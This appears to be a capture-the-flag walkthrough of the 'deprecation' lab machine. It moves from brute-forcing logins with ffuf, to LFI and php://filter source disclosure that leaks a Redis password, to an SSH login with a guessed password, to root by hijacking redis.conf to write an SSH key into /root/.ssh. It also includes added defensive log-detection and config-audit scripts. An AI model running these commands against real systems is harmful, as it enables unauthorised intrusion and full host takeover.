mazesec deprecation
Enumeration
The initial scan found that the target exposes only the usual web ports.
# -x must be used to specify extensions; otherwise Gobuster only looks for directories by default
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak
Key endpoints found:
- /index.php (login page)
- /reg.php (registration page; its password anti-reuse check can be abused to enumerate existing passwords)
- /config.php (back-end configuration)
- /dashboard.php (control panel after login)
FFUF
Guessing passwords with ffuf
Copy the raw HTTP request captured in Burp, save it on the Kali machine and name it req.txt.
ffuf -request req.txt -request-proto http -w /usr/share/wordlists/rockyou.txt -fs "[]"
Two passwords were obtained: guest123 and 123123
Similarly, use ffuf against index.php to test usernames
ffuf -request login.txt -request-proto http -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -mc "301"
Result:
- guest:guest123
- test:123123
Web
The login form has a simple anti-brute-force mechanism (a session-based limit on the number of attempts), but directory scanning turned up the back-end page dashboard.php.
Code audit
Testing dashboard.php showed that it has a Local File Inclusion (LFI) vulnerability.
# Read /etc/passwd to find high-value targets
http://192.168.0.104/dashboard.php?view=../../../../../etc/passwd
Because a PHP file pulled in directly comes back blank (it is parsed rather than displayed), the php://filter stream wrapper is used to extract the core back-end source code.
# Read the source of the core business logic
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=config.php" | base64 -d
Two major findings came out of the source:
- Redis credential leak: index.php hard-codes the password of the local Redis instance: mypassword123.
- Underlying function limitation: dashboard.php reads files with file_get_contents() rather than include(). The target therefore never executes the included content, so the traditional log poisoning tactic fails.
Exploitation (password derivation via social engineering)
Stepping out of the deserialization rabbit hole and re-reading the /etc/passwd file obtained through the LFI, the system comment field (GECOS) carries a very obvious hint:
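From the defender's side, the traversal and php://filter probes shown above leave a recognisable trail in the web server access log. The following added example (not part of the writeup) parses Combined Log Format lines, undoes single and double URL-encoding, and flags the three indicators seen here; the log lines are constructed samples.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines (not from the writeup): a benign request,
# a directory-traversal probe and a php://filter source-disclosure probe.
SAMPLE_LOG = """\
192.168.0.50 - - [01/Jan/2024:10:00:01 +0000] "GET /dashboard.php?view=home HTTP/1.1" 200 512
192.168.0.50 - - [01/Jan/2024:10:00:05 +0000] "GET /dashboard.php?view=../../../../../etc/passwd HTTP/1.1" 200 1833
192.168.0.50 - - [01/Jan/2024:10:00:09 +0000] "GET /dashboard.php?view=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dconfig.php HTTP/1.1" 200 740
"""

# Client IP, request line (method + target) and status code of a Combined Log Format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(target):
    """Return a sorted list of indicator names found in one request target."""
    decoded = unquote(unquote(target))  # undo single and double URL-encoding
    hits = set()
    for _, value in parse_qsl(urlsplit(decoded).query, keep_blank_values=True):
        low = value.lower()
        if '../' in low or '..\\' in low:
            hits.add('path-traversal')
        if re.match(r'(php|file|data|phar|expect)://', low):
            hits.add('stream-wrapper')
        if 'convert.base64-encode' in low:
            hits.add('php-filter-source-disclosure')
    return sorted(hits)

def scan_log(text):
    """Return (ip, target, status, indicators) for every line carrying an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m['target'])
        if hits:
            findings.append((m['ip'], m['target'], int(m['status']), hits))
    return findings

if __name__ == '__main__':
    for ip, target, status, hits in scan_log(SAMPLE_LOG):
        print(f'{ip} {status} {",".join(hits)} {target}')
```

A 200 status on a flagged request (as in the samples) is the case worth escalating, since it means the file read succeeded.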
shanran:x:1000:1000:shan******:/home/shanran:/bin/sh
Combined with the pattern the developer used for the test accounts in config.php:
- account test -> password 123123
- account guest -> password guest123
Derivation: shanran (7 characters) + 123 (3 characters) = 10 characters, a perfect match for the shan****** mask.
USER
Log in over SSH directly with the derived password.
# Obtain the initial foothold (Initial Access)
ssh shanran@192.168.0.104
# Password: shanran123
ROOT
Collecting privilege information on the system reveals a classic privilege escalation through a misconfigured service.
shanran@Deprecation:~$ sudo -l
User shanran may run the following commands on Deprecation:
(ALL) NOPASSWD: /sbin/rc-service redis restart
(ALL) NOPASSWD: /sbin/rc-service redis stop
(ALL) NOPASSWD: /sbin/rc-service redis start
Check the running state and permissions of the Redis service:
# 1. Redis is improperly running as root
ps aux | grep redis -> root 2396 ... /usr/bin/redis-server
# 2. The redis group has write permission on the main configuration file
ls -l /etc/redis.conf -> -rw-rw-r-- 1 root redis 325 /etc/redis.conf
# 3. Confirm that the current user shanran belongs to the redis group
id
Exploitation (Redis arbitrary file write hijack)
Using the write permission on /etc/redis.conf, force Redis's persistence directory onto the root user's SSH trust directory, then have Redis write our SSH public key into it.
# 1. Tamper with the Redis configuration file to take over the persistence path
echo 'dir /root/.ssh' > /etc/redis.conf
echo 'dbfilename authorized_keys' >> /etc/redis.conf
echo 'port 6379' >> /etc/redis.conf
echo 'requirepass mypassword123' >> /etc/redis.conf
echo 'bind 127.0.0.1' >> /etc/redis.conf
# 2. Restart Redis as root so that the malicious configuration takes effect
sudo /sbin/rc-service redis restart
# 3. Log in to Redis and inject the Kali attack machine's SSH public key
redis-cli -a mypassword123
127.0.0.1:6379> flushall
# Note: add newlines before and after the key so the RDB binary framing does not break parsing of the key
127.0.0.1:6379> set crackit "\n\nssh-rsa AAAAB3Nza...[your public key]... kali@kali\n\n"
127.0.0.1:6379> save
127.0.0.1:6379> exit
# 4. SSH straight in as root without a password
ssh root@192.168.0.104
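Every step of this escalation depends on two host-side mistakes: a redis.conf that non-root users can write, and a `dir`/`dbfilename` pair that is allowed to point at a credential file. The following added audit script (not part of the writeup) parses a redis.conf, flags a persistence path aimed at a sensitive location, and checks the live file's permission bits; the tampered configuration embedded in it is a constructed copy of the one above.

```python
import os
import stat

# Constructed copy of the tampered /etc/redis.conf from the steps above (not taken from a real host).
HIJACKED_CONF = """\
dir /root/.ssh
dbfilename authorized_keys
port 6379
requirepass mypassword123
bind 127.0.0.1
"""
SENSITIVE_DIRS = ('/root', '/home', '/etc', '/var/spool/cron', '/var/www')
SENSITIVE_FILES = ('authorized_keys', 'crontab', '.bashrc', '.profile')

def parse_redis_conf(text):
    """Last-wins map of directive -> value; comments and blank lines are skipped."""
    pairs = (l.split('#', 1)[0].strip().partition(' ') for l in text.splitlines())
    return {k.lower(): v.strip().strip('"') for k, _, v in pairs if k}

def config_findings(text):
    """Reasons a redis.conf looks like the persistence-path hijack used above."""
    conf = parse_redis_conf(text)
    reasons = []
    d = os.path.normpath(conf.get('dir', '.'))
    if any(d == s or d.startswith(s + '/') for s in SENSITIVE_DIRS):
        reasons.append(f'dir points into a sensitive location: {d}')
    name = conf.get('dbfilename', 'dump.rdb')
    if os.path.basename(name) in SENSITIVE_FILES:
        reasons.append(f'dbfilename is a credential or startup file: {name}')
    return reasons

def mode_is_group_or_world_writable(mode):
    """True if an st_mode value (e.g. os.stat(...).st_mode) lets group or others write."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_conf_file(path='/etc/redis.conf'):
    """Audit a live config file; returns [] when it is absent or looks sane."""
    if not os.path.exists(path):
        return []
    findings = []
    st_mode = os.stat(path).st_mode
    if mode_is_group_or_world_writable(st_mode):
        findings.append(f'{path} is writable by group/others (mode {oct(st_mode & 0o777)})')
    with open(path) as fh:
        findings.extend(config_findings(fh.read()))
    return findings

if __name__ == '__main__':
    print('\n'.join(audit_conf_file()) or 'no findings')
```

The `-rw-rw-r-- root redis` mode from the `ls -l` output above is exactly what the permission check reports; the fix is to make the file root-owned with mode 0644 and to run redis-server as its own unprivileged user so a restart cannot write into /root.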